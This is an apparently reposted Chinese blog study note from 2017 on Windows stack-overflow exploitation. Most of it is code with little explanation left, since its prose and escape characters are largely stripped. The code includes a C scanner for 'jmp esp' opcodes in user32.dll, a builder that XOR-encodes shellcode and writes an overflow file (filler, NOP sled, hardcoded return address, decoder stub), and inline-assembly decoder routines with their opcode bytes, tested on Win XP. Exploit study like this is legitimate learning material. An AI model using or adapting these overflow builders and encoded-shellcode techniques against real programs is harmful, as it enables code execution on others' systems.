本文讲的是
Windows Shellcode学习笔记——栈溢出中对jmp esp的利用与优化,
0x00 前言
buffer 前栈帧EBP 返回地址 ESP
#include <stdio.h> #include <windows.h> #define DLL_NAME "user32.dll" int main() { BYTE *ptr; int position,address; HINSTANCE handle; BOOL done_flag=FALSE; handle=LoadLibrary(DLL_NAME); if(!handle) { printf("load dll error"); return 0; } ptr=(BYTE *)handle; for(position=0;!done_flag;position++) { try { if(ptr[position]==0xFF &&ptr[position+1]==0xE4) { int address=(int)ptr+position; printf("OPCODE found at 0x%xn",address); } } catch(...) { int address=(int)ptr+position; printf("END OF 0x%xn",address); done_flag=true; } } return 0; }
"x34x33x32x31“*11+"x90x90x90x90x90x90x90x90"+"x53x93xD2x77"+"x83xC2x14x33xC9x8Ax1Cx0Ax80xF3x44x88x1Cx0Ax41x80xFBx91x75xF1"+加密的弹框shellcode+xD5
#include <windows.h> size_t GetSize(char * szFilePath) { size_t size; FILE* f = fopen(szFilePath, "rb"); fseek(f, 0, SEEK_END); size = ftell(f); rewind(f); fclose(f); return size; } unsigned char* ReadBinaryFile(char *szFilePath, size_t *size) { unsigned char *p = NULL; FILE* f = NULL; size_t res = 0; *size = GetSize(szFilePath); if (*size == 0) return NULL; f = fopen(szFilePath, "rb"); if (f == NULL) { printf("Binary file does not exists!n"); return 0; } p = new unsigned char[*size]; rewind(f); res = fread(p, sizeof(unsigned char), *size, f); fclose(f); if (res == 0) { delete[] p; return NULL; } return p; } int main(int argc, char* argv[]) { char *szFilePath="c:testshellcode.bin"; char *szFilePath2="c:testshellcode2.bin"; unsigned char *BinData = NULL; size_t size = 0; BinData = ReadBinaryFile(szFilePath, &size); for(int i=0;i<size;i++) { BinData[i]=BinData[i]^0x44; } FILE* f = NULL; f = fopen(szFilePath2, "wb"); if (f == NULL) { printf("Create errorn"); return 0; } char filler[]="x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31"; char nop[]="x90x90x90x90x90x90x90x90"; char jmpesp[]="x53x93xD2x77"; char decode[]="x83xC2x14x33xC9x8Ax1Cx0Ax80xF3x44x88x1Cx0Ax41x80xFBx91x75xF1"; char end[]="xD5"; fwrite(filler,sizeof(filler)-1,1,f); fwrite(nop,sizeof(nop)-1,1,f); fwrite(jmpesp,sizeof(jmpesp)-1,1,f); fwrite(decode,sizeof(decode)-1,1,f); fwrite(BinData,size,1,f); fwrite(end,1,1,f); fclose(f); }
if(!(fp=fopen("password.txt","rw+")))
if(!(fp=fopen("password2.txt","rb")))
测试系统:Win XP 编译器:VC6.0 build版本: debug版本
void main() { __asm { sub edi,0x8F0 mov eax,edi add eax,0x28 xor ecx,ecx decode_loop: mov bl,[eax+ecx] xor bl,0x44 mov [eax+ecx],bl inc ecx cmp bl,0x91 jne decode_loop } }
"x81xEFxF0x08x00x00x8BxC7x83xC0x28x33xC9x8Ax1Cx08x80xF3x44x88x1Cx08x41x80xFBx91x75xF1"
void main() { __asm { add edi,0X11111111 sub edi,0X111119A1 mov eax,edi add eax,0x5A xor ecx,ecx decode_loop: mov bl,[eax+ecx] xor bl,0x44 mov [eax+ecx],bl inc ecx cmp bl,0x91 jne decode_loop } }
"x81xC7x11x11x11x11x81xEFxA1x19x11x11x8BxC7x83xC0x5Ax33xC9x8Ax1Cx08x80xF3x44x88x1Cx08x41x80xFBx91x75xF1"
unsigned char *GetAddress() { BYTE *ptr; int position,address; HINSTANCE handle; BOOL done_flag=FALSE; handle=LoadLibrary(DLL_NAME); if(!handle) { printf("load dll error"); return 0; } ptr=(BYTE *)handle; for(position=0;!done_flag;position++) { try { if(ptr[position]==0xFF &&ptr[position+1]==0xE4) { int address=(int)ptr+position; unsigned char *Buff=(unsigned char *)&address; return Buff; } } catch(...) { int address=(int)ptr+position; printf("END OF 0x%xn",address); done_flag=true; } } return 0; } unsigned char *jmpesp=NULL; jmpesp=GetAddress();
原文发布时间为:2017年3月8日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。